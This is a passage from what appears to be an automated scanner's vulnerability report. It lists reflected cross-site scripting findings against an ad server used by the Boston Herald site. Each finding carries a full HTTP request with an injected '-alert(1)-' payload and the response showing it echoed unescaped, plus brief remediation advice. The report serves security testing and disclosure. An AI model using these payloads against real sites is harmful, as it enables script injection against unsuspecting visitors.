Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:46 GMT
Connection: close
Content-Length: 7653

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-39606642_1296266086","http://ad.doubleclick.net/adj39f09'-alert(1)-'5901c85919a/q1.bosherald/be_ent;net=q1;u=,q1-39606642_1296266086,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8
...[SNIP]...

4.56. http://a.collective-media.net/cmadj/q1.bosherald/be_ent [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_ent

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba16c'-alert(1)-'c2fbc8b1d49 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosheraldba16c'-alert(1)-'c2fbc8b1d49/be_ent;sz=300x250;net=q1;ord=2134060438?;env=ifr;ord1=204282;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:46 GMT
Connection: close
Content-Length: 7645

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-14122048_1296266086","http://ad.doubleclick.net/adj/q1.bosheraldba16c'-alert(1)-'c2fbc8b1d49/be_ent;net=q1;u=,q1-14122048_1296266086,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-c
...[SNIP]...

4.57. http://a.collective-media.net/cmadj/q1.bosherald/be_ent [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_ent

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 148cd'-alert(1)-'f73be52e6c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald/be_ent148cd'-alert(1)-'f73be52e6c0;sz=300x250;net=q1;ord=2134060438?;env=ifr;ord1=204282;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:46 GMT
Connection: close
Content-Length: 7645

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-36999889_1296266086","http://ad.doubleclick.net/adj/q1.bosherald/be_ent148cd'-alert(1)-'f73be52e6c0;net=q1;u=,q1-36999889_1296266086,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sport
...[SNIP]...

4.58. http://a.collective-media.net/cmadj/q1.bosherald/be_ent [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_ent

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f21c'-alert(1)-'d04176c671d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald/be_ent;sz=300x250;net=q1;ord=2134060438?;&5f21c'-alert(1)-'d04176c671d=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7631
Date: Sat, 29 Jan 2011 05:19:40 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
b1b3,none,q1.none_h-q1.ent_h-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=300x250;net=q1;&5f21c'-alert(1)-'d04176c671d=1;contx=none;dc=w;btg=q1.none_h;btg=q1.ent_h;btg=q1.polit_l;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;bt
...[SNIP]...

4.59. http://a.collective-media.net/cmadj/q1.bosherald/be_ent [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_ent

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9623d'-alert(1)-'9f272341de0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald/be_ent;sz=9623d'-alert(1)-'9f272341de0 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:36 GMT
Connection: close
Content-Length: 7619

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
6076,11d765b6a10b1b3,none,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=9623d'-alert(1)-'9f272341de0;contx=none;dc=w;btg=q1.none_h;btg=q1.ent_m;btg=q1.polit_l;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=
...[SNIP]...

4.60. http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_ent_fr

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 549b1'-alert(1)-'fc8e7858573 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj549b1'-alert(1)-'fc8e7858573/q1.bosherald/be_ent_fr;sz=300x250;net=q1;ord=1194202561?;env=ifr;ord1=359683;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:41 GMT
Connection: close
Content-Length: 7656

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-54426313_1296266081","http://ad.doubleclick.net/adj549b1'-alert(1)-'fc8e7858573/q1.bosherald/be_ent_fr;net=q1;u=,q1-54426313_1296266081,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rd
...[SNIP]...

4.61. http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_ent_fr

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eea20'-alert(1)-'a4b741dc452 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosheraldeea20'-alert(1)-'a4b741dc452/be_ent_fr;sz=300x250;net=q1;ord=1194202561?;env=ifr;ord1=359683;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:41 GMT
Connection: close
Content-Length: 7648

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-88653520_1296266081","http://ad.doubleclick.net/adj/q1.bosheraldeea20'-alert(1)-'a4b741dc452/be_ent_fr;net=q1;u=,q1-88653520_1296266081,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_
...[SNIP]...

4.62. http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_ent_fr

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload feec8'-alert(1)-'139d285e531 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald/be_ent_frfeec8'-alert(1)-'139d285e531;sz=300x250;net=q1;ord=1194202561?;env=ifr;ord1=359683;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:42 GMT
Connection: close
Content-Length: 7648

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-50028198_1296266082","http://ad.doubleclick.net/adj/q1.bosherald/be_ent_frfeec8'-alert(1)-'139d285e531;net=q1;u=,q1-50028198_1296266082,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sport
...[SNIP]...

4.63. http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_ent_fr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6329'-alert(1)-'26662898743 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald/be_ent_fr;sz=300x250;net=q1;ord=1194202561?;&f6329'-alert(1)-'26662898743=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7634
Date: Sat, 29 Jan 2011 05:19:39 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
b1b3,none,q1.none_h-q1.ent_h-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=300x250;net=q1;&f6329'-alert(1)-'26662898743=1;contx=none;dc=w;btg=q1.none_h;btg=q1.ent_h;btg=q1.polit_l;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;bt
...[SNIP]...

4.64. http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/be_ent_fr

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b11b4'-alert(1)-'a0b31f3de82 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.bosherald/be_ent_fr;sz=b11b4'-alert(1)-'a0b31f3de82 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:33 GMT
Connection: close
Content-Length: 7622

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
6073,11d765b6a10b1b3,none,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=b11b4'-alert(1)-'a0b31f3de82;contx=none;dc=w;btg=q1.none_h;btg=q1.ent_m;btg=q1.polit_l;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=
...[SNIP]...

4.65. http://a.collective-media.net/cmadj/q1.bosherald/ent [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a1e8'-alert(1)-'36cbf08e36e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj4a1e8'-alert(1)-'36cbf08e36e/q1.bosherald/ent;sz=300x250;net=q1;ord=395221226?;env=ifr;ord1=173312;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:41 GMT
Connection: close
Content-Length: 7647

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-9346846_1296266081","http://ad.doubleclick.net/adj4a1e8'-alert(1)-'36cbf08e36e/q1.bosherald/ent;net=q1;u=,q1-9346846_1296266081,11d765b6a10b1b3,ent,q1.none_h-q1.ent_m-q1.polit_l-ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.
...[SNIP]...

4.66. http://a.collective-media.net/cmadj/q1.bosherald/ent [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.bosherald/ent

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4d68'-alert(1)-'439fb269440 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

